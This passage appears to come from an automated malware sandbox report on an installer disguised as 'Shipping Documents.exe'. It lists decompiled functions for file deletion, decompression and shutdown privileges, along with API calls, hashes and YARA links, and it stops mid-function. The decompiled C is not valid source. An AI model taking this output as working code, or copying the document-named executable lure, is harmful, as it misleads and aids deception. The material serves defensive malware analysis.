                                            • Part of subcall function 00403949: CloseHandle.KERNEL32(000002B4,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040395B
                                            • Part of subcall function 00403949: CloseHandle.KERNEL32(000002C4,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040396F
                                          • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403780
                                          • ExitProcess.KERNEL32 ref: 004037A1
                                          • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038BE
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004038C5
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038DD
                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004038FC
                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403920
                                          • ExitProcess.KERNEL32 ref: 00403943
                                            • Part of subcall function 00405944: MessageBoxIndirectA.USER32 ref: 0040599F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                                          • String ID: "$"C:\Users\user\Desktop\202139769574 Shipping Documents.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\202139769574 Shipping Documents.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                          • API String ID: 2181712934-3209825283
                                          • Opcode ID: 76ff467a8b0f681ac06bfba7839aaa220d55bfd30843e9aac785b98ea7b1fc20
                                          • Instruction ID: 58fd70292e904df403817bc88459b0d0072f96867834376c9e66c0a03af616e1
                                          • Opcode Fuzzy Hash: 76ff467a8b0f681ac06bfba7839aaa220d55bfd30843e9aac785b98ea7b1fc20
                                          • Instruction Fuzzy Hash: 2EC1D7701047806ED7217F659D49B2B3EACEB81706F05447FF582B61E2CB7C8A198B6E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004059F0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E004059F0(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CAE(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x4247e8 =  *0x4247e8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406228(0x421d58, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C07(_t73);
					} else {
						lstrcatA(0x421d58, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x421d58,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405BEB( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00406228(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059A8(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E0040534F(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x4247e8 =  *0x4247e8 + 1;
										} else {
											E0040534F(0xfffffff1, _t73);
											E00406007(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004059F0(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x421d58 - 0x5c;
					if( *0x421d58 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E0040659C(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BC0(_t73);
							_t40 = E004059A8(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040534F(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040534F(0xfffffff1, _t73);
							return E00406007(_t72, _t73, 0);
						}
						L33:
						 *0x4247e8 =  *0x4247e8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                          0x004059fa
                                          0x004059ff
                                          0x00405a08
                                          0x00405a0b
                                          0x00405a13
                                          0x00405a16
                                          0x00405a19
                                          0x00405a21
                                          0x00405a23
                                          0x00405a24
                                          0x00000000
                                          0x00405a24
                                          0x00405a2f
                                          0x00405a32
                                          0x00405a32
                                          0x00405a32
                                          0x00405a36
                                          0x00405a49
                                          0x00405a50
                                          0x00405a55
                                          0x00405a59
                                          0x00405a69
                                          0x00405a5b
                                          0x00405a61
                                          0x00405a61
                                          0x00405a6e
                                          0x00405a71
                                          0x00405a7c
                                          0x00405a82
                                          0x00405a87
                                          0x00405a97
                                          0x00405a99
                                          0x00405a9f
                                          0x00405aa2
                                          0x00405aa5
                                          0x00405b5d
                                          0x00405b5d
                                          0x00405b61
                                          0x00405b63
                                          0x00405b63
                                          0x00405b63
                                          0x00405b63
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405aab
                                          0x00405aab
                                          0x00405ab4
                                          0x00405aba
                                          0x00405abf
                                          0x00405ac2
                                          0x00405ac4
                                          0x00405ac8
                                          0x00405aca
                                          0x00405aca
                                          0x00405ac8
                                          0x00405acd
                                          0x00405ad0
                                          0x00405ae3
                                          0x00405ae5
                                          0x00405aea
                                          0x00405af1
                                          0x00405b0c
                                          0x00405b11
                                          0x00405b13
                                          0x00405b37
                                          0x00405b15
                                          0x00405b15
                                          0x00405b18
                                          0x00405b2c
                                          0x00405b1a
                                          0x00405b1d
                                          0x00405b25
                                          0x00405b25
                                          0x00405b18
                                          0x00405af3
                                          0x00405af9
                                          0x00405afb
                                          0x00405b01
                                          0x00405b01
                                          0x00405afb
                                          0x00000000
                                          0x00405af1
                                          0x00405ad2
                                          0x00405ad5
                                          0x00405ad7
                                          0x00000000
                                          0x00000000
                                          0x00405ad9
                                          0x00405adb
                                          0x00000000
                                          0x00000000
                                          0x00405add
                                          0x00405ae1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405b3c
                                          0x00405b46
                                          0x00405b4c
                                          0x00405b4c
                                          0x00405b57
                                          0x00000000
                                          0x00405b57
                                          0x00405a73
                                          0x00405a7a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405a38
                                          0x00405a38
                                          0x00405a3a
                                          0x00405b67
                                          0x00405b69
                                          0x00405b6c
                                          0x00405bbd
                                          0x00405bbd
                                          0x00405bbd
                                          0x00405b6e
                                          0x00405b71
                                          0x00405b7c
                                          0x00405b81
                                          0x00405b83
                                          0x00000000
                                          0x00000000
                                          0x00405b86
                                          0x00405b92
                                          0x00405b97
                                          0x00405b99
                                          0x00000000
                                          0x00405bb4
                                          0x00405b9b
                                          0x00405b9e
                                          0x00000000
                                          0x00000000
                                          0x00405ba3
                                          0x00000000
                                          0x00405baa
                                          0x00405b73
                                          0x00405b73
                                          0x00000000
                                          0x00405b73
                                          0x00405a40
                                          0x00405a43
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405a43

                                          APIs
                                          • DeleteFileA.KERNELBASE(?,?,73BCFA90,73BCF560,00000000), ref: 00405A19
                                          • lstrcatA.KERNEL32(00421D58,\*.*,00421D58,?,?,73BCFA90,73BCF560,00000000), ref: 00405A61
                                          • lstrcatA.KERNEL32(?,0040A014,?,00421D58,?,?,73BCFA90,73BCF560,00000000), ref: 00405A82
                                          • lstrlenA.KERNEL32(?,?,0040A014,?,00421D58,?,?,73BCFA90,73BCF560,00000000), ref: 00405A88
                                          • FindFirstFileA.KERNEL32(00421D58,?,?,?,0040A014,?,00421D58,?,?,73BCFA90,73BCF560,00000000), ref: 00405A99
                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B46
                                          • FindClose.KERNEL32(00000000), ref: 00405B57
                                          Strings
                                          • \*.*, xrefs: 00405A5B
                                          • "C:\Users\user\Desktop\202139769574 Shipping Documents.exe" , xrefs: 004059F0
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: "C:\Users\user\Desktop\202139769574 Shipping Documents.exe" $\*.*
                                          • API String ID: 2035342205-1467303385
                                          • Opcode ID: a66e31797c185062c7638da0132466ba220af7043d537e09de82d45b9939a7ed
                                          • Instruction ID: f9fcd54ed45cecb295d84a7a00b3a90cccdf7efad1d91ba0bada197ffcbf79f0
                                          • Opcode Fuzzy Hash: a66e31797c185062c7638da0132466ba220af7043d537e09de82d45b9939a7ed
                                          • Instruction Fuzzy Hash: 0851C430900A44AADB21AB658C85BBF7A78DF42714F14417FF851711D2C77C7A82DE69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406925, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E00406925() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
